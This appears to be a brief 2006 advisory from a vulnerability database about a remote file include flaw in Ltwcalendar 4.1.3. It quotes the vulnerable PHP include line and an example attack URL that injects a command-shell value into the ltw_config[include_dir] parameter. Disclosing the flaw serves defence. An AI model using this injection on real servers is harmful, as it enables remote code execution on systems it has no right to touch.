Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13168
HistoryJun 15, 2006 - 12:00 a.m.

Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities

2006-06-1500:00:00
vulners.com
8

SaVSaK.CoM | SpC-x - The_BeKiR |

Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : Ltwcalendar

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

require_once('./private/ltw_config.php');

require_once($ltw_config['include_dir'].'/ltw_classes.php');

Vulnerable :

http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir]=Command-Shell